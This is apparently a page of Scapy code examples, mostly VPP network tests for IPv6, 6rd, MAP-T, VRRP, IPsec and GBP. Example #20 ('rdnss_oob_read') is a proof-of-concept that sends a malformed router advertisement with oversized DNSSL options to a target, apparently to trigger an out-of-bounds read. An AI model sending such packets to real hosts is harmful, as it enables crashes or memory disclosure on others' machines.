コード例 #1
0
    def create_packet_header_IPv6_SRH_IPv4(self, srcaddr, sidlist, segleft):
        """Create packet header: IPv4 encapsulated in SRv6:
        IPv6 header with SRH, IPv4 header, UDP header

        :param int srcaddr: outer source address
        :param list sidlist: segment list of outer IPv6 SRH
        :param int segleft: segments-left field of outer IPv6 SRH

        Outer IPv6 source address is set to srcaddr
        Outer IPv6 destination address is set to sidlist[segleft]
        Inner IPv4 source address is 123.1.1.1
        Inner IPv4 destination address is 124.1.1.1
        UDP source port and destination port are 1234
        """

        p = IPv6(src=srcaddr, dst=sidlist[segleft]) / \
            IPv6ExtHdrSegmentRouting(addresses=sidlist,
                                     segleft=segleft, nh=4) / \
            IP(src='123.1.1.1', dst='124.1.1.1') / \
            UDP(sport=1234, dport=1234)
        return p
コード例 #2
0
    def vrrp_adv_packet(self, prio=None, src_ip=None):
        dst_ip = self._adv_dest_ip
        if prio is None:
            prio = self._prio
        eth = Ether(dst=self._adv_dest_mac, src=self._virtual_mac)
        vrrp = VRRPv3(vrid=self._vr_id,
                      priority=prio,
                      ipcount=len(self._vips),
                      adv=self._intvl)
        if self._is_ipv6:
            src_ip = (self._intf.local_ip6_ll if src_ip is None else src_ip)
            ip = IPv6(src=src_ip, dst=dst_ip, nh=IPPROTO_VRRP, hlim=255)
            vrrp.addrlist = self._vips
        else:
            src_ip = (self._intf.local_ip4 if src_ip is None else src_ip)
            ip = IP(src=src_ip, dst=dst_ip, proto=IPPROTO_VRRP, ttl=255, id=0)
            vrrp.addrlist = self._vips

        # Fill in default values & checksums
        pkt = Ether(raw(eth / ip / vrrp))
        return pkt
コード例 #3
0
ファイル: test_ip6.py プロジェクト: fdio-stack/vpp-mirror
    def create_stream(self, src_if, packet_sizes):
        """Create input packet stream for defined interface.

        :param VppInterface src_if: Interface to create packet stream for.
        :param list packet_sizes: Required packet sizes.
        """
        pkts = []
        for i in range(0, 257):
            dst_if = self.flows[src_if][i % 2]
            info = self.create_packet_info(src_if, dst_if)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IPv6(src=src_if.remote_ip6, dst=dst_if.remote_ip6) /
                 UDP(sport=1234, dport=1234) / Raw(payload))
            info.data = p.copy()
            if isinstance(src_if, VppSubInterface):
                p = src_if.add_dot1_layer(p)
            size = packet_sizes[(i // 2) % len(packet_sizes)]
            self.extend_packet(p, size)
            pkts.append(p)
        return pkts
コード例 #4
0
ファイル: test_sixrd.py プロジェクト: yaoferics/vpp
    def test_6rd_ip4_to_ip6_suffix(self):
        """ ip4 -> ip6 (decap) 6rd test """

        rv = self.vapi.sixrd_add_tunnel(
            0, str(ip_address('2002::').packed), 16,
            str(ip_address('172.0.0.0').packed), 8,
            str(ip_address(self.pg0.local_ip4).packed), 0, True)
        self.assertEqual(rv.retval, 0)

        self.tunnel_index = rv.sw_if_index

        self.vapi.cli("show ip6 fib")
        p_ether = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
        p_ip4 = IP(src=self.pg1.remote_ip4, dst=self.pg0.local_ip4)
        p_ip6 = (IPv6(src="2002:1002:0200::1", dst=self.pg1.remote_ip6) /
                 UDP(sport=1234, dport=1234))

        p = (p_ether / p_ip4 / p_ip6)
        rx = self.send_and_expect(self.pg0, p * 10, self.pg1)
        for p in rx:
            self.validate_4in6(p, p_ip6)
コード例 #5
0
 def send_packet(self, msg_type, t1=None, t2=None, iapdopt=None):
     if t1 is None:
         t1 = self.T1
     if t2 is None:
         t2 = self.T2
     if iapdopt is None:
         opt_ia_pd = DHCP6OptIA_PD(iaid=1, T1=t1, T2=t2)
     else:
         opt_ia_pd = DHCP6OptIA_PD(iaid=1, T1=t1, T2=t2, iapdopt=iapdopt)
     p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
          IPv6(src=util.mk_ll_addr(self.pg0.remote_mac),
               dst=self.pg0.local_ip6_ll) /
          UDP(sport=547, dport=546) /
          msg_type(trid=self.trid) /
          DHCP6OptServerId(duid=self.server_duid) /
          DHCP6OptClientId(duid=self.client_duid) /
          opt_ia_pd
          )
     self.pg0.add_stream([p])
     self.pg_enable_capture(self.pg_interfaces)
     self.pg_start()
コード例 #6
0
    def test_map_t_echo_request_ip6_to_ip4(self):
        """ MAP-T echo request IPv6 -> IPv4 """

        eth = Ether(src=self.pg1.remote_mac,
                    dst=self.pg1.local_mac)
        ip = IPv6(src=self.ipv6_cpe_address,
                  dst=self.ipv6_map_address)
        icmp = ICMPv6EchoRequest()
        icmp.id = self.ipv6_udp_or_tcp_map_port
        payload = "H" * 10
        tx_pkt = eth / ip / icmp / payload

        self.pg_send(self.pg1, tx_pkt * 1)

        rx_pkts = self.pg0.get_capture(1)
        rx_pkt = rx_pkts[0]

        self.assertEqual(rx_pkt[IP].proto, IP(proto="icmp").proto)
        self.assertEqual(rx_pkt[ICMP].type, ICMP(type="echo-request").type)
        self.assertEqual(rx_pkt[ICMP].code, 0)
        self.assertEqual(rx_pkt[ICMP].id, self.ipv6_udp_or_tcp_map_port)
コード例 #7
0
    def test_map_t_tcp_ip6_to_ip4(self):
        """ MAP-T TCP IPv6 -> IPv4 """

        eth = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
        ip = IPv6(src=self.ipv6_cpe_address, dst=self.ipv6_map_address)
        tcp = TCP(sport=self.ipv6_udp_or_tcp_map_port,
                  dport=self.ipv6_udp_or_tcp_internet_port)
        payload = "a" * 82
        tx_pkt = eth / ip / tcp / payload

        self.pg_send(self.pg1, tx_pkt * 1)

        rx_pkts = self.pg0.get_capture(1)
        rx_pkt = rx_pkts[0]

        self.v4_address_check(rx_pkt)
        self.v4_port_check(rx_pkt, TCP)
        self.assertEqual(rx_pkt[IP].proto, IP(proto="tcp").proto)
        self.assertEqual(rx_pkt[IP].tos, 0)  # IPv6 TC passed to v4 ToS
        df_bit = IP(flags="DF").flags
        self.assertNotEqual(rx_pkt[IP].flags & df_bit, df_bit)
コード例 #8
0
ファイル: native.py プロジェクト: yvyshneva/scapy
 def recv_raw(self, x=MTU):
     try:
         data, address = self.ins.recvfrom(x)
     except IOError:  # BlockingIOError
         return None, None, None
     from scapy.layers.inet import IP
     from scapy.layers.inet6 import IPv6
     if self.ipv6:
         # AF_INET6 does not return the IPv6 header. Let's build it
         # (host, port, flowinfo, scopeid)
         host, _, flowinfo, _ = address
         header = raw(
             IPv6(
                 src=host,
                 dst=self.host_ip6,
                 fl=flowinfo,
                 nh=self.proto,  # fixed for AF_INET6
                 plen=len(data)))
         return IPv6, header + data, time.time()
     else:
         return IP, data, time.time()
コード例 #9
0
    def test_6rd_ip4_to_ip6_suffix(self):
        """ ip4 -> ip6 (decap) 6rd test """

        rv = self.vapi.ipip_6rd_add_tunnel(0, inet_pton(AF_INET6,
                                                        '2002::'), 16, 0,
                                           inet_pton(AF_INET, '172.0.0.0'), 8,
                                           self.pg0.local_ip4n, True)

        self.tunnel_index = rv.sw_if_index

        self.vapi.cli("show ip6 fib")
        p_ether = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
        p_ip4 = IP(src=self.pg1.remote_ip4, dst=self.pg0.local_ip4)
        p_ip6 = (IPv6(src="2002:1002:0200::1", dst=self.pg1.remote_ip6) /
                 UDP(sport=1234, dport=1234))

        p = (p_ether / p_ip4 / p_ip6)
        rx = self.send_and_expect(self.pg0, p * 10, self.pg1)
        for p in rx:
            self.validate_4in6(p, p_ip6)
        self.vapi.ipip_6rd_del_tunnel(self.tunnel_index)
コード例 #10
0
    def test_map_t_tcp_ip4_to_ip6(self):
        """MAP-T TCP IPv4 -> IPv6"""

        eth = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
        ip = IP(src=self.pg0.remote_ip4, dst=self.ipv4_map_address, tos=0)
        tcp = TCP(
            sport=self.ipv4_udp_or_tcp_internet_port,
            dport=self.ipv4_udp_or_tcp_map_port,
        )
        payload = "a" * 82
        tx_pkt = eth / ip / tcp / payload

        self.pg_send(self.pg0, tx_pkt * 1)

        rx_pkts = self.pg1.get_capture(1)
        rx_pkt = rx_pkts[0]

        self.v6_address_check(rx_pkt)
        self.v6_port_check(rx_pkt, TCP)
        self.assertEqual(rx_pkt[IPv6].tc, 0)  # IPv4 ToS passed to v6 TC
        self.assertEqual(rx_pkt[IPv6].nh, IPv6(nh="TCP").nh)
コード例 #11
0
    def test_vrrp6_backup_nond(self):
        """ IPv6 Backup VR ignores NDP """
        # We need an address for a virtual IP that is not the IP that
        # ARP requests will originate from

        vr_id = 100
        prio = 100
        intvl = self._default_adv
        intvl_s = intvl * 0.01
        vip = self.pg0.remote_hosts[1].ip6
        vr = VppVRRPVirtualRouter(self,
                                  self.pg0,
                                  vr_id,
                                  prio=prio,
                                  intvl=intvl,
                                  flags=self._default_flags,
                                  vips=[vip])
        vr.add_vpp_config()
        self._vrs.append(vr)

        nsma = in6_getnsma(inet_pton(socket.AF_INET6, vip))
        dmac = in6_getnsmac(nsma)
        dst_ip = inet_ntop(socket.AF_INET6, nsma)

        ndp_req = (Ether(dst=dmac, src=self.pg0.remote_mac) /
                   IPv6(dst=dst_ip, src=self.pg0.remote_ip6) /
                   ICMPv6ND_NS(tgt=vip) /
                   ICMPv6NDOptSrcLLAddr(lladdr=self.pg0.remote_mac))

        # Before the VR is started make sure no reply to request for VIP
        self.send_and_assert_no_replies(self.pg0, [ndp_req], timeout=1)

        # VR should start in backup state and still should not reply to NDP
        # send a higher priority adv to make sure it does not become master
        adv = vr.vrrp_adv_packet(prio=prio + 10, src_ip=self.pg0.remote_ip6)
        pkts = [adv, ndp_req]
        vr.start_stop(is_start=1)
        self.send_and_assert_no_replies(self.pg0, pkts, timeout=intvl_s)

        vr.start_stop(is_start=0)
コード例 #12
0
    def verify_tun_64(self, p, count=1):
        self.vapi.cli("clear errors")
        try:
            config_tun_params(p, self.encryption_type, self.tun_if)
            send_pkts = self.gen_encrypt_pkts6(p.scapy_tun_sa,
                                               self.tun_if,
                                               src=p.remote_tun_if_host6,
                                               dst=self.pg1.remote_ip6,
                                               count=count)
            recv_pkts = self.send_and_expect(self.tun_if, send_pkts, self.pg1)
            for recv_pkt in recv_pkts:
                self.assert_equal(recv_pkt[IPv6].src, p.remote_tun_if_host6)
                self.assert_equal(recv_pkt[IPv6].dst, self.pg1.remote_ip6)
                self.assert_packet_checksums_valid(recv_pkt)
            send_pkts = self.gen_pkts6(self.pg1,
                                       src=self.pg1.remote_ip6,
                                       dst=p.remote_tun_if_host6,
                                       count=count)
            recv_pkts = self.send_and_expect(self.pg1, send_pkts, self.tun_if)
            for recv_pkt in recv_pkts:
                try:
                    decrypt_pkt = p.vpp_tun_sa.decrypt(recv_pkt[IP])
                    if not decrypt_pkt.haslayer(IPv6):
                        decrypt_pkt = IPv6(decrypt_pkt[Raw].load)
                    self.assert_equal(decrypt_pkt.src, self.pg1.remote_ip6)
                    self.assert_equal(decrypt_pkt.dst, p.remote_tun_if_host6)
                    self.assert_packet_checksums_valid(decrypt_pkt)
                except:
                    self.logger.error(ppp("Unexpected packet:", recv_pkt))
                    try:
                        self.logger.debug(ppp("Decrypted packet:",
                                              decrypt_pkt))
                    except:
                        pass
                    raise
        finally:
            self.logger.info(self.vapi.ppcli("show error"))
            self.logger.info(self.vapi.ppcli("show ipsec all"))

        self.verify_counters(p, count)
コード例 #13
0
 def test_tun_basic66(self, count=1):
     """ ipsec 6o6 tunnel basic test """
     try:
         p = self.params[socket.AF_INET6]
         vpp_tun_sa, scapy_tun_sa = self.configure_sa_tun(p)
         send_pkts = self.gen_encrypt_pkts6(scapy_tun_sa,
                                            self.tun_if,
                                            src=p.remote_tun_if_host,
                                            dst=self.pg1.remote_ip6,
                                            count=count)
         recv_pkts = self.send_and_expect(self.tun_if, send_pkts, self.pg1)
         for recv_pkt in recv_pkts:
             self.assert_equal(recv_pkt[IPv6].src, p.remote_tun_if_host)
             self.assert_equal(recv_pkt[IPv6].dst, self.pg1.remote_ip6)
             self.assert_packet_checksums_valid(recv_pkt)
         send_pkts = self.gen_pkts6(self.pg1,
                                    src=self.pg1.remote_ip6,
                                    dst=p.remote_tun_if_host,
                                    count=count)
         recv_pkts = self.send_and_expect(self.pg1, send_pkts, self.tun_if)
         for recv_pkt in recv_pkts:
             try:
                 decrypt_pkt = vpp_tun_sa.decrypt(recv_pkt[IPv6])
                 if not decrypt_pkt.haslayer(IPv6):
                     decrypt_pkt = IPv6(decrypt_pkt[Raw].load)
                 self.assert_equal(decrypt_pkt.src, self.pg1.remote_ip6)
                 self.assert_equal(decrypt_pkt.dst, p.remote_tun_if_host)
                 self.assert_packet_checksums_valid(decrypt_pkt)
             except:
                 self.logger.debug(ppp("Unexpected packet:", recv_pkt))
                 try:
                     self.logger.debug(ppp("Decrypted packet:",
                                           decrypt_pkt))
                 except:
                     pass
                 raise
     finally:
         self.logger.info(self.vapi.ppcli("show error"))
         self.logger.info(self.vapi.ppcli("show ipsec"))
コード例 #14
0
ファイル: test_classifier_ip6.py プロジェクト: stzh/vpp
    def create_stream(self, src_if, dst_if, packet_sizes,
                      proto_l=UDP(sport=1234, dport=5678)):
        """Create input packet stream for defined interfaces.

        :param VppInterface src_if: Source Interface for packet stream.
        :param VppInterface dst_if: Destination Interface for packet stream.
        :param list packet_sizes: packet size to test.
        :param Scapy proto_l: Required IP protocol. Default protocol is UDP.
        """
        pkts = []

        for size in packet_sizes:
            info = self.create_packet_info(src_if, dst_if)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IPv6(src=src_if.remote_ip6, dst=dst_if.remote_ip6) /
                 proto_l /
                 Raw(payload))
            info.data = p.copy()
            self.extend_packet(p, size)
            pkts.append(p)
        return pkts
コード例 #15
0
    def handle_ns_request(self, pipe, packet):
        '''
            process incoming NS request and send
            corresponding NA.
        '''
        self.log("ND: RX NS: {0} <-- {1},{2}".format(packet[ICMPv6ND_NS].tgt,
                                                     packet[IPv6].src,
                                                     packet[Ether].src))

        na_response = Ether(src=packet[Ether].dst, dst=packet[Ether].src)/ \
                       IPv6(src=packet[ICMPv6ND_NS].tgt, dst=packet[IPv6].src, hlim = 255)/ \
                       ICMPv6ND_NA(tgt=packet[ICMPv6ND_NS].tgt, R = 0, S = 1, O = 1)/ \
                       ICMPv6NDOptDstLLAddr(lladdr=packet[Ether].dst)

        if not self.vlan.is_default():
            self.vlan.embed(na_response, fmt=self.fmt)

        self.log("ND: TX NA: {0},{1} -> {2},{3}".format(
            packet[ICMPv6ND_NS].tgt, packet[Ether].dst, packet[IPv6].src,
            packet[Ether].src))
        pipe.async_tx_pkt(na_response)
        self.record.verified()
コード例 #16
0
    def test_no_p2p_subif(self):
        """standard routing without p2p subinterfaces"""
        self.logger.info("FFP_TEST_START_0001")

        route_8000 = VppIpRoute(self,
                                "8000::",
                                64, [
                                    VppRoutePath(self.pg0.remote_ip6,
                                                 self.pg0.sw_if_index,
                                                 proto=DpoProto.DPO_PROTO_IP6)
                                ],
                                is_ip6=1)
        route_8000.add_vpp_config()

        self.packets = [
            (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IPv6(src="3001::1", dst="8000::100") /
             UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
        ]
        self.send_packets(self.pg1, self.pg0)

        self.logger.info("FFP_TEST_FINISH_0001")
コード例 #17
0
ファイル: test_sixrd.py プロジェクト: lch2244/srv6-mobile
    def test_6rd_ip4_to_ip6_suffix(self):
        """ ip4 -> ip6 (decap) 6rd test """

        rv = self.vapi.ipip_6rd_add_tunnel(ip6_table_id=0,
                                           ip4_table_id=0,
                                           ip6_prefix='2002::/16',
                                           ip4_prefix='172.0.0.0/8',
                                           ip4_src=self.pg0.local_ip4,
                                           security_check=True)
        self.tunnel_index = rv.sw_if_index

        self.vapi.cli("show ip6 fib")
        p_ether = Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac)
        p_ip4 = IP(src=self.pg1.remote_ip4, dst=self.pg0.local_ip4)
        p_ip6 = (IPv6(src="2002:1002:0200::1", dst=self.pg1.remote_ip6) /
                 UDP(sport=1234, dport=1234))

        p = (p_ether / p_ip4 / p_ip6)
        rx = self.send_and_expect(self.pg0, p * 10, self.pg1)
        for p in rx:
            self.validate_4in6(p, p_ip6)
        self.vapi.ipip_6rd_del_tunnel(self.tunnel_index)
コード例 #18
0
    def test_vrrp6_accept_mode_disabled(self):
        """ IPv6 Master VR does not reply for VIP w/ accept mode off """

        # accept mode only matters when prio < 255, so it will have to
        # come up as a backup and take over as master after the timeout
        vr_id = 100
        prio = 100
        intvl = self._default_adv
        vip = self.pg0.remote_hosts[4].ip6
        vr = VppVRRPVirtualRouter(self, self.pg0, vr_id,
                                  prio=prio, intvl=intvl,
                                  flags=self._default_flags,
                                  vips=[vip])
        self._vrs.append(vr)
        vr.add_vpp_config()

        # After adding the VR, it should be in the init state
        vr.assert_state_equals(VRRP_VR_STATE_INIT)

        # start VR
        vr.start_stop(is_start=1)
        vr.assert_state_equals(VRRP_VR_STATE_BACKUP)

        # wait for VR to take over as master
        end_time = vr.start_time() + vr.master_down_seconds()
        sleep_s = end_time - time.time()
        time.sleep(sleep_s)
        vr.assert_state_equals(VRRP_VR_STATE_MASTER)

        # send an ICMPv6 echo to the VR virtual IP address
        echo = (Ether(dst=vr.virtual_mac(), src=self.pg0.remote_mac) /
                IPv6(dst=vip, src=self.pg0.remote_ip6) /
                ICMPv6EchoRequest(seq=1, id=self.pg0.sw_if_index))
        self.pg_send(self.pg0, [echo])

        # wait for an echo reply. none should be received
        time.sleep(1)
        self.pg0.assert_nothing_captured(filter_out_fn=is_not_echo_reply)
コード例 #19
0
ファイル: test_map_br.py プロジェクト: testwill/vpp
    def test_map_t_echo_reply_ip4_to_ip6(self):
        """ MAP-T echo reply IPv4 -> IPv6 """

        eth = Ether(src=self.pg1.remote_mac,
                    dst=self.pg1.local_mac)
        ip = IP(src=self.pg0.remote_ip4,
                dst=self.ipv4_map_address)
        icmp = ICMP(type="echo-reply",
                    id=self.ipv6_udp_or_tcp_map_port)
        payload = "H" * 10
        tx_pkt = eth / ip / icmp / payload

        self.pg_send(self.pg0, tx_pkt * 1)

        rx_pkts = self.pg1.get_capture(1)
        rx_pkt = rx_pkts[0]

        self.assertEqual(rx_pkt[IPv6].nh, IPv6(nh="ICMPv6").nh)
        self.assertEqual(rx_pkt[ICMPv6EchoReply].type,
                         ICMPv6EchoReply(type="Echo Reply").type)
        self.assertEqual(rx_pkt[ICMPv6EchoReply].code, 0)
        self.assertEqual(rx_pkt[ICMPv6EchoReply].id,
                         self.ipv6_udp_or_tcp_map_port)
コード例 #20
0
def rdnss_oob_read(target_addr):
    def build_domain_name(name_len):
        CHUNKS = name_len // 0x3f
        subdomains = []
        for i in range(CHUNKS):
            subdomains.append(string.ascii_lowercase[i] * 0x3f)
        domain = '.'.join(subdomains)
        print('final len(domain) :{}'.format(len(domain)))
        return domain

    ip = IPv6(dst=target_addr, hlim=255)
    ra = ICMPv6ND_RA()
    dnssl1 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(1024)])
    dnssl2 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(375)])
    dnssl3 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=['1' * 22])

    rdnss = MyICMPv6NDOptRDNSS(lifetime=1)

    pkt = ip / ra / dnssl1 / dnssl2 / dnssl3 / rdnss

    print("total pakcet len: %d" % (len(pkt)))
    print("total ipv6 len: %d" % (len(ra / dnssl1 / dnssl2 / dnssl3 / rdnss)))
    send(pkt)
コード例 #21
0
ファイル: utils.py プロジェクト: wesavetheworld/whoshere
def upnp_probe():
    """
        send out a series of UPNP probes (IP4 & IP6)
    """
    global iface_bcast_addr

    probe = "M-SEARCH * HTTP/1.1\r\n" \
        "Host:{IP}:1900\r\n" \
        "ST:{ST}\r\n" \
        "Man:\"ssdp:discover\"\r\n" \
        "MX:5\r\n" \
        "USER-AGENT:  OS/version UPnP/1.1 whoshere/1.0\r\n\r\n"

    #    if iface_bcast_addr is None:
    #        iface_bcast_addr = get_brdaddr(ArpMon.iface)
    #    send(IP(dst=iface_bcast_addr) / UDP(sport=1900, dport=1900) / \
    #            probe.format("ssdp:all"), loop=2, inter=0.3)
    #    time.sleep(.5)
    send(IP(dst="239.255.255.250") / UDP(sport=1900, dport=1900) / \
        probe.format(ST="ssdp:all", IP="239.255.255.250"))
    time.sleep(.5)
    send(IPv6(dst="ff02::c") / UDP(sport=1900, dport=1900) / \
        probe.format(ST="ssdp:all", IP="[ff02::c]"))
コード例 #22
0
    def create_packet_header_IPv6_SRH_L2(self, sidlist, segleft, vlan=0):
        """Create packet header: L2 encapsulated in SRv6:
        IPv6 header with SRH, L2

        :param list sidlist: segment list of outer IPv6 SRH
        :param int segleft: segments-left field of outer IPv6 SRH
        :param vlan: L2 vlan; if vlan!=0 then add 802.1q header

        Outer IPv6 destination address is set to sidlist[segleft]
        IPv6 source address is 1234::1
        """
        eth = Ether(src='00:11:22:33:44:55', dst='00:55:44:33:22:11')
        etype = 0x8137  # IPX
        if vlan:
            # add 802.1q layer
            eth /= Dot1Q(vlan=vlan, type=etype)
        else:
            eth.type = etype

        p = (IPv6(src='1234::1', dst=sidlist[segleft]) /
             IPv6ExtHdrSegmentRouting(
                 addresses=sidlist, segleft=segleft, nh=59) / eth)
        return p
コード例 #23
0
    def test_6rd_ip4_to_ip6_vrf(self):
        """ip4 -> ip6 (decap) 6rd VRF test"""

        rv = self.vapi.ipip_6rd_add_tunnel(
            ip6_table_id=20,
            ip4_table_id=10,
            ip6_prefix="2002::/16",
            ip4_prefix="0.0.0.0/0",
            ip4_src=self.pg2.local_ip4,
            security_check=True,
        )
        self.tunnel_index = rv.sw_if_index
        rv = self.vapi.ipip_6rd_del_tunnel(rv.sw_if_index)
        rv = self.vapi.ipip_6rd_add_tunnel(
            ip6_table_id=20,
            ip4_table_id=10,
            ip6_prefix="2002::/16",
            ip4_prefix="0.0.0.0/0",
            ip4_src=self.pg2.local_ip4,
            security_check=True,
        )
        self.tunnel_index = rv.sw_if_index
        self.vapi.sw_interface_set_table(self.tunnel_index, 1, 20)

        p_ip6 = IPv6(src="2002:AC10:0402::1", dst=self.pg3.remote_ip6) / UDP(
            sport=1234, dport=1234)

        p = (Ether(src=self.pg2.remote_mac, dst=self.pg2.local_mac) /
             IP(src=self.pg3.remote_ip4, dst=self.pg2.local_ip4) / p_ip6)

        p_reply = p_ip6

        rx = self.send_and_expect(self.pg2, p * 10, self.pg3)
        for p in rx:
            self.validate_4in6(p, p_reply)
        self.vapi.sw_interface_set_table(self.tunnel_index, 1, 0)
        self.vapi.ipip_6rd_del_tunnel(self.tunnel_index)
コード例 #24
0
 def create_stream(self, pg_id):
     pg_targets = [None] * 3
     pg_targets[0] = [1, 2]
     pg_targets[1] = [0, 2]
     pg_targets[2] = [0, 1]
     pkts = []
     for i in range(0, 257):
         target_pg_id = pg_targets[pg_id][i % 2]
         info = self.create_packet_info(pg_id, target_pg_id)
         payload = self.info_to_payload(info)
         p = (Ether(dst=self.VPP_MACS[pg_id], src=self.MY_MACS[pg_id]) /
              IPv6(src=self.MY_SOFT_IP6S[pg_id],
                   dst=self.MY_SOFT_IP6S[target_pg_id]) /
              UDP(sport=1234, dport=1234) / Raw(payload))
         info.data = p.copy()
         self.add_dot1_layers(pg_id, p)
         if not isinstance(self.INT_DETAILS[pg_id], self.Subint):
             packet_sizes = [76, 512, 1518, 9018]
         else:
             packet_sizes = [76, 512, 1518 + 4, 9018 + 4]
         size = packet_sizes[(i / 2) % len(packet_sizes)]
         self.extend_packet(p, size)
         pkts.append(p)
     return pkts
コード例 #25
0
ファイル: ICMPv6_RS.py プロジェクト: jiaojiner/Python_Network
def icmpv6_rs(ifname):
    ll_mac = get_mac_address(ifname)  # 获取本机接口MAC地址
    # -----------IPv6头部------------
    # Next Header: 0x3A (ICMPv6)
    # 原地址: Link Local address
    # 目的地址: FF02::2(所有路由器)
    base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::2')
    # ----------ICMPv6头部----------
    # ICMPv6 Type: 133
    # ICMPv6 Code: 0 (RS)
    router_solicitation = ICMPv6ND_RS()
    # ----Source Link-Layer Address----
    # 源地址: 本地MAC地址
    src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac)
    # 构建数据包
    packet = base / router_solicitation / src_ll_addr
    # packet.show()
    # 发送数据包,接受返回数据包
    result = sr1(packet, timeout=2, verbose=False)
    # result.show()
    # 提取返回数据包中的网关MAC
    print(
        "gwmac: ",
        result.getlayer(
            "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address").
        fields['lladdr'])
    # 提取返回数据包中的MTU
    print(
        "mtu: ",
        result.getlayer(
            "ICMPv6 Neighbor Discovery Option - MTU").fields['mtu'])
    # 提取返回数据包中的Prefix信息
    print(
        "prefix: ",
        result.getlayer("ICMPv6 Neighbor Discovery Option - Prefix Information"
                        ).fields['prefix'])
コード例 #26
0
ファイル: test_gbp.py プロジェクト: marekgr/vpp
    def test_gbp(self):
        """ Group Based Policy """

        nat_table = VppIpTable(self, 20)
        nat_table.add_vpp_config()
        nat_table = VppIpTable(self, 20, is_ip6=True)
        nat_table.add_vpp_config()

        #
        # Bridge Domains
        #
        self.vapi.bridge_domain_add_del(1,
                                        flood=1,
                                        uu_flood=1,
                                        forward=1,
                                        learn=0,
                                        arp_term=1,
                                        is_add=1)
        self.vapi.bridge_domain_add_del(2,
                                        flood=1,
                                        uu_flood=1,
                                        forward=1,
                                        learn=0,
                                        arp_term=1,
                                        is_add=1)
        self.vapi.bridge_domain_add_del(20,
                                        flood=1,
                                        uu_flood=1,
                                        forward=1,
                                        learn=0,
                                        arp_term=1,
                                        is_add=1)

        #
        # 3 EPGs, 2 of which share a BD.
        #
        epgs = []
        recircs = []
        epgs.append(
            VppGbpEndpointGroup(self, 220, 0, 1, self.pg4, self.loop0,
                                "10.0.0.128", "2001:10::128"))
        recircs.append(VppGbpRecirc(self, epgs[0], self.loop3))
        epgs.append(
            VppGbpEndpointGroup(self, 221, 0, 1, self.pg5, self.loop0,
                                "10.0.1.128", "2001:10:1::128"))
        recircs.append(VppGbpRecirc(self, epgs[1], self.loop4))
        epgs.append(
            VppGbpEndpointGroup(self, 222, 0, 2, self.pg6, self.loop1,
                                "10.0.2.128", "2001:10:2::128"))
        recircs.append(VppGbpRecirc(self, epgs[2], self.loop5))

        #
        # 2 NAT EPGs, one for floating-IP subnets, the other for internet
        #
        epgs.append(
            VppGbpEndpointGroup(self, 333, 20, 20, self.pg7, self.loop2,
                                "11.0.0.128", "3001::128"))
        recircs.append(VppGbpRecirc(self, epgs[3], self.loop6, is_ext=True))
        epgs.append(
            VppGbpEndpointGroup(self, 444, 20, 20, self.pg8, self.loop2,
                                "11.0.0.129", "3001::129"))
        recircs.append(VppGbpRecirc(self, epgs[4], self.loop8, is_ext=True))

        epg_nat = epgs[3]
        recirc_nat = recircs[3]

        #
        # 4 end-points, 2 in the same subnet, 3 in the same BD
        #
        eps = []
        eps.append(
            VppGbpEndpoint(self, self.pg0, epgs[0], recircs[0], "10.0.0.1",
                           "11.0.0.1"))
        eps.append(
            VppGbpEndpoint(self, self.pg1, epgs[0], recircs[0], "10.0.0.2",
                           "11.0.0.2"))
        eps.append(
            VppGbpEndpoint(self, self.pg2, epgs[1], recircs[1], "10.0.1.1",
                           "11.0.0.3"))
        eps.append(
            VppGbpEndpoint(self, self.pg3, epgs[2], recircs[2], "10.0.2.1",
                           "11.0.0.4"))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg0,
                           epgs[0],
                           recircs[0],
                           "2001:10::1",
                           "3001::1",
                           is_ip6=True))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg1,
                           epgs[0],
                           recircs[0],
                           "2001:10::2",
                           "3001::2",
                           is_ip6=True))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg2,
                           epgs[1],
                           recircs[1],
                           "2001:10:1::1",
                           "3001::3",
                           is_ip6=True))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg3,
                           epgs[2],
                           recircs[2],
                           "2001:10:2::1",
                           "3001::4",
                           is_ip6=True))

        #
        # Config related to each of the EPGs
        #
        for epg in epgs:
            # IP config on the BVI interfaces
            if epg != epgs[1] and epg != epgs[4]:
                epg.bvi.set_table_ip4(epg.rd)
                epg.bvi.set_table_ip6(epg.rd)

                # The BVIs are NAT inside interfaces
                self.vapi.nat44_interface_add_del_feature(epg.bvi.sw_if_index,
                                                          is_inside=1,
                                                          is_add=1)
                self.vapi.nat66_add_del_interface(epg.bvi.sw_if_index,
                                                  is_inside=1,
                                                  is_add=1)

            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip4_n, 32)
            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip6_n,
                                                   128,
                                                   is_ipv6=True)

            # EPG uplink interfaces in the BD
            epg.uplink.set_table_ip4(epg.rd)
            epg.uplink.set_table_ip6(epg.rd)
            self.vapi.sw_interface_set_l2_bridge(epg.uplink.sw_if_index,
                                                 epg.bd)

            # add the BD ARP termination entry for BVI IP
            self.vapi.bd_ip_mac_add_del(bd_id=epg.bd,
                                        mac=mactobinary(self.router_mac),
                                        ip=epg.bvi_ip4_n,
                                        is_ipv6=0,
                                        is_add=1)
            self.vapi.bd_ip_mac_add_del(bd_id=epg.bd,
                                        mac=mactobinary(self.router_mac),
                                        ip=epg.bvi_ip6_n,
                                        is_ipv6=1,
                                        is_add=1)

            # epg[1] shares the same BVI to epg[0]
            if epg != epgs[1] and epg != epgs[4]:
